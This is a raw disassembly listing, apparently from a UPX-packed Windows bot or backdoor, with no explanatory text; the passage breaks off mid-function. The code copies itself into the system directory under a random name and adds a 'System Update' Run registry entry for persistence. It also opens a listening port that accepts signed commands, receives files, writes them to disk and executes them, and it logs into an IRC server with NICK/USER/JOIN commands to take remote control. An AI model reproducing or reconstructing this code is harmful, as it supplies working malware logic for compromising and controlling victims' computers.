mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_315025B1: ; CODE XREF: sub_31502548+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jnz short loc_315025E8
push ebx
push edi
push esi
call sub_315023AF
lea eax, [ebp+var_138]
push eax
call sub_31502490
add esp, 10h
loc_315025E8: ; CODE XREF: sub_31502548+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_315025B1
pop edi
pop esi
pop ebx
leave
retn
sub_31502548 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315025F6 proc near ; CODE XREF: sub_315026C2+D1�p
; sub_315026C2+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_3150260B
push [ebp+arg_0]
call dword_31501094 ; DeleteFileA
loc_3150260B: ; CODE XREF: sub_315025F6+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31501068 ; GetSystemDirectoryA
test eax, eax
jz locret_315026C0
push esi
call dword_31501124 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31501932
mov esi, dword_3150106C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; dword_3150106C
lea eax, [ebp+var_78]
push offset asc_31505CF0 ; "\\"
push eax
call esi ; dword_3150106C
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; dword_3150106C
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31501070 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_315010A0 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_3150243D
add esp, 14h
push ds:dword_31506164
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31501074 ; WinExec
push 1F4h
call dword_315010A4 ; Sleep
push 0
call dword_3150109C ; ExitProcess
pop esi
locret_315026C0: ; CODE XREF: sub_315025F6+23�j
leave
retn
sub_315025F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315026C2 proc near ; CODE XREF: UPX0:31501D64�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31501060 ; GetModuleFileNameA
test eax, eax
jz loc_315027FB
and ds:dword_315061A0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jz short loc_31502748
call dword_31501124 ; rand
push 0Ah
mov ebx, offset aDfashnzdsdl ; "dfashnzdsdl"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31501932
pop ecx
pop ecx
push ebx
call dword_315010A0 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_3150243D
add esp, 14h
jmp short loc_31502757
; ---------------------------------------------------------------------------
loc_31502748: ; CODE XREF: sub_315026C2+4D�j
lea eax, [ebp+var_20]
push eax
push offset aDfashnzdsdl ; "dfashnzdsdl"
call dword_31501088 ; lstrcpyA
loc_31502757: ; CODE XREF: sub_315026C2+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jz short loc_3150279D
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_3150243D
lea eax, [ebp+var_84]
push eax
push 0
call sub_315025F6
add esp, 1Ch
jmp short loc_315027FB
; ---------------------------------------------------------------------------
loc_3150279D: ; CODE XREF: sub_315026C2+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31501064 ; lstrcmpiA
test eax, eax
jnz short loc_315027E6
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jnz short loc_315027FB
push ebx
push edi
push esi
mov ds:dword_315061A0, 1
call sub_315023AF
add esp, 0Ch
jmp short loc_315027FB
; ---------------------------------------------------------------------------
loc_315027E6: ; CODE XREF: sub_315026C2+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_315025F6
pop ecx
pop ecx
loc_315027FB: ; CODE XREF: sub_315026C2+1F�j
; sub_315026C2+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_315026C2 endp
; =============== S U B R O U T I N E =======================================
sub_31502800 proc near ; CODE XREF: sub_31501BA8+7A�p
; sub_315028AE+2A�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3150105C ; VirtualAlloc
retn
sub_31502800 endp
; =============== S U B R O U T I N E =======================================
sub_31502814 proc near ; CODE XREF: sub_315028AE+EB�p
; sub_31502B4C+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31501058 ; VirtualFree
retn
sub_31502814 endp
; =============== S U B R O U T I N E =======================================
sub_31502826 proc near ; CODE XREF: sub_31502B4C+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31501088 ; lstrcpyA
mov eax, esi
pop esi
retn
sub_31502826 endp
; =============== S U B R O U T I N E =======================================
sub_3150283F proc near ; CODE XREF: sub_31502B4C+3A�p
push ebx
push ebp
mov ebx, dword_31501018
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+0Eh]
push ebp
push esi
call ebx ; dword_31501018
test eax, eax
jnz short loc_3150286E
push 8
push 1
push ebp
push ebp
push esi
call ebx ; dword_31501018
test eax, eax
jnz short loc_3150286E
push 1
pop eax
jmp short loc_3150288E
; ---------------------------------------------------------------------------
loc_3150286E: ; CODE XREF: sub_3150283F+1B�j
; sub_3150283F+28�j
add edi, 12h
push edi
push ebp
push ebp
push 114h
push offset dword_31505CF8
push dword ptr [esi]
call dword_3150101C ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3150288E: ; CODE XREF: sub_3150283F+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_3150283F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31502893 proc near ; CODE XREF: sub_31502B4C+7E�p
push esi
mov esi, ecx
push dword ptr [esi+12h]
call dword_31501010 ; CryptDestroyKey
push 0
push dword ptr [esi+0Eh]
call dword_31501014 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_31502893 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315028AE proc near ; CODE XREF: sub_31502B4C+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_31501050 ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_31501054 ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_31502800
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_315011A0 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_31503A44 ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_3150298F
jl short loc_3150291C
cmp ecx, 61C46800h
ja short loc_3150298F
loc_3150291C: ; CODE XREF: sub_315028AE+64�j
cmp eax, 0FFFFFFF7h
jl short loc_3150298F
jg short loc_3150292B
cmp ecx, 9E3B9800h
jb short loc_3150298F
loc_3150292B: ; CODE XREF: sub_315028AE+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+0Eh]
call dword_31501000 ; CryptCreateHash
test eax, eax
jz short loc_31502980
push 0
push 8
push esi
push [ebp+var_4]
call dword_31501004 ; CryptHashData
test eax, eax
jz short loc_31502980
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_31502980
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+12h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31501008 ; CryptVerifySignatureA
test eax, eax
jnz short loc_315029A8
loc_31502980: ; CODE XREF: sub_315028AE+98�j
; sub_315028AE+AA�j ...
call dword_31501098 ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
loc_3150298F: ; CODE XREF: sub_315028AE+62�j
; sub_315028AE+6C�j ...
call dword_31501098 ; RtlGetLastWin32Error
push 2
pop esi
loc_31502998: ; CODE XREF: sub_315028AE+117�j
push edi
call sub_31502814
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_315029A8: ; CODE XREF: sub_315028AE+D0�j
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
call dword_31501124 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3150119C ; send
jmp short loc_31502998
sub_315028AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315029C7 proc near ; CODE XREF: sub_31502B4C+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_315029E6
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_31502B3E
; ---------------------------------------------------------------------------
loc_315029E6: ; CODE XREF: sub_315029C7+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31502AF7
lea eax, [ebp+var_220]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_31501048 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_315010A8 ; lstrcpynA
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_315010F0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_31502AE5
mov ebx, dword_3150119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; dword_3150119C
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31502A8D
inc [ebp+arg_4]
loc_31502A8D: ; CODE XREF: sub_315029C7+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31502ADA
loc_31502A97: ; CODE XREF: sub_315029C7+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31502ADA
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_3150104C ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; dword_3150119C
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31502A97
loc_31502ADA: ; CODE XREF: sub_315029C7+CE�j
; sub_315029C7+E5�j
push [ebp+var_C]
call dword_315010BC ; CloseHandle
jmp short loc_31502B47
; ---------------------------------------------------------------------------
loc_31502AE5: ; CODE XREF: sub_315029C7+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502AF7: ; CODE XREF: sub_315029C7+31�j
cmp [ebp+arg_4], 1
jnz short loc_31502B26
lea eax, [ebp+var_118]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_31501048 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B26: ; CODE XREF: sub_315029C7+134�j
cmp [ebp+arg_4], 3
jnz short loc_31502B47
push dword ptr [edi]
add edi, 4
push edi
call sub_31501962
pop ecx
pop ecx
push 0
push 4
push esi
loc_31502B3E: ; CODE XREF: sub_315029C7+1A�j
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B47: ; CODE XREF: sub_315029C7+11C�j
; sub_315029C7+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_315029C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502B4C proc near ; DATA XREF: sub_31502BE8+AA�o
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_315018BA
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_30]
rep movsd
push [ebp+var_1C]
call dword_315010D8 ; SetEvent
mov esi, 10000h
push esi
call sub_31502800
pop ecx
mov edi, eax
lea ecx, [ebp+var_18]
call sub_31502826
lea ecx, [ebp+var_18]
call sub_3150283F
lea eax, [ebp+var_30]
lea ecx, [ebp+var_18]
push eax
call sub_315028AE
test eax, eax
jnz short loc_31502BC0
loc_31502B9B: ; CODE XREF: sub_31502B4C+72�j
push 0
push esi
push edi
push [ebp+var_30]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_31502BC0
test eax, eax
jz short loc_31502BC0
push eax
push edi
push [ebp+var_30]
call sub_315029C7
add esp, 0Ch
jmp short loc_31502B9B
; ---------------------------------------------------------------------------
loc_31502BC0: ; CODE XREF: sub_31502B4C+4D�j
; sub_31502B4C+5F�j ...
push edi
call sub_31502814
pop ecx
lea ecx, [ebp+var_18]
call sub_31502893
push [ebp+var_30]
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_31502B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31502BE8 proc near ; DATA XREF: sub_31501D96+156�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_3150118C ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_31503A38 ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_31502C19: ; CODE XREF: sub_31502BE8+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31501194 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31501170 ; bind
test eax, eax
jz short loc_31502C43
inc esi
cmp esi, 0Ah
jl short loc_31502C19
loc_31502C43: ; CODE XREF: sub_31502BE8+53�j
push 32h
push [ebp+var_4]
call dword_31501174 ; listen
mov ebx, dword_315010BC
loc_31502C54: ; CODE XREF: sub_31502BE8+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31501178 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_3150108C ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_31502B4C
push esi
push esi
call dword_315010D0 ; CreateThread
push eax
call ebx ; dword_315010BC
push 3E8h
push [ebp+var_30]
call dword_31501090 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; dword_315010BC
jmp short loc_31502C54
sub_31502BE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502CB7 proc near ; CODE XREF: sub_31502D3C+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31502CEA
add ebx, 1Ah
loc_31502CEA: ; CODE XREF: sub_31502CB7+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31501110
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; dword_31501110
pop ecx
test eax, eax
pop ecx
jz short loc_31502D14
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31502D37
; ---------------------------------------------------------------------------
loc_31502D14: ; CODE XREF: sub_31502CB7+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; dword_31501110
pop ecx
test eax, eax
pop ecx
jz short loc_31502D34
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31502D37
; ---------------------------------------------------------------------------
loc_31502D34: ; CODE XREF: sub_31502CB7+68�j
mov al, [ebp+arg_0]
loc_31502D37: ; CODE XREF: sub_31502CB7+5B�j
; sub_31502CB7+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31502CB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502D3C proc near ; CODE XREF: sub_31503722+F7�p
; sub_31503722+137�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31502D97
mov edi, [ebp+arg_0]
push ebx
loc_31502D51: ; CODE XREF: sub_31502D3C+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31502CB7
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31502D7B
cmp bl, 7Ah
jg short loc_31502D7B
movsx esi, bl
sub esi, 61h
loc_31502D7B: ; CODE XREF: sub_31502D3C+32�j
; sub_31502D3C+37�j
cmp bl, 41h
jl short loc_31502D8B
cmp bl, 5Ah
jg short loc_31502D8B
movsx esi, bl
sub esi, 41h
loc_31502D8B: ; CODE XREF: sub_31502D3C+42�j
; sub_31502D3C+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31502D51
pop ebx
jmp short loc_31502D9A
; ---------------------------------------------------------------------------
loc_31502D97: ; CODE XREF: sub_31502D3C+F�j
mov edi, [ebp+arg_0]
loc_31502D9A: ; CODE XREF: sub_31502D3C+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31502D3C endp
; =============== S U B R O U T I N E =======================================
sub_31502DA1 proc near ; CODE XREF: UPX0:3150346E�p
push esi
mov esi, ecx
push 20001h
call sub_31502800
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31502DA1 endp
; =============== S U B R O U T I N E =======================================
sub_31502DB6 proc near ; CODE XREF: UPX0:315034CE�p
; UPX0:31503521�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_315010A8 ; lstrcpynA
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31502DB6 endp
; ---------------------------------------------------------------------------
loc_31502DD4: ; CODE XREF: UPX0:31503AD6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_31502814
push dword ptr [esi+2Ch]
call sub_31502814
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31502DEC proc near ; CODE XREF: UPX0:315034EC�p
; UPX0:3150353F�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_3150118C ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_315019B8
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31501194 ; ntohs
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31501198 ; connect
test eax, eax
jnz loc_31502FF1
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FF1
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31501932
mov ebp, dword_3150113C
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; dword_3150113C
mov edi, dword_315010A4
add esp, 14h
push 64h
call edi ; dword_315010A4
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_315010A0
push eax
call ebx ; dword_315010A0
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; dword_3150113C
add esp, 0Ch
push 64h
call edi ; dword_315010A4
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; dword_315010A0
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FF1
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; dword_315010A4
loc_31502F15: ; CODE XREF: sub_31502DEC+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31502F9E
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31501932
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; dword_3150113C
add esp, 14h
push 64h
call edi ; dword_315010A4
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; dword_315010A0
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31502FF1
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31502F15
; ---------------------------------------------------------------------------
loc_31502F9E: ; CODE XREF: sub_31502DEC+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; dword_3150113C
add esp, 10h
push 64h
call edi ; dword_315010A4
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; dword_315010A0
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31502FFF
loc_31502FF1: ; CODE XREF: sub_31502DEC+4E�j
; sub_31502DEC+6B�j ...
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
push 1
pop eax
jmp short loc_31503021
; ---------------------------------------------------------------------------
loc_31502FFF: ; CODE XREF: sub_31502DEC+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
mov [esi+284h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_31503021: ; CODE XREF: sub_31502DEC+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31502DEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150302E proc near ; CODE XREF: sub_31502DEC+7C�p
; sub_31502DEC+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_315030A8
mov esi, dword_315010A0
lea edi, [eax+4]
push edi
call esi ; dword_315010A0
dec eax
cmp eax, 63h
jle short loc_31503067
push 1
pop eax
jmp short loc_315030AA
; ---------------------------------------------------------------------------
loc_31503067: ; CODE XREF: sub_3150302E+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_315010A8 ; lstrcpynA
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; dword_315010A0
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3150119C ; send
loc_315030A8: ; CODE XREF: sub_3150302E+20�j
xor eax, eax
loc_315030AA: ; CODE XREF: sub_3150302E+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3150302E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315030B1 proc near ; CODE XREF: UPX0:3150358D�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_3150113C ; wsprintfA
mov edi, dword_315010A4
add esp, 0Ch
push 64h
call edi ; dword_315010A4
lea eax, [ebp+var_12C]
push 0
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 64h
call edi ; dword_315010A4
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_3150317A
test eax, eax
jz short loc_3150317A
push 64h
call edi ; dword_315010A4
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
mov edi, dword_31501120
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; dword_31501120
pop ecx
test eax, eax
pop ecx
jz short loc_31503153
push 3
jmp short loc_3150317C
; ---------------------------------------------------------------------------
loc_31503153: ; CODE XREF: sub_315030B1+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; dword_31501120
pop ecx
test eax, eax
pop ecx
jz short loc_31503167
push 4
jmp short loc_3150317C
; ---------------------------------------------------------------------------
loc_31503167: ; CODE XREF: sub_315030B1+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_315010A8 ; lstrcpynA
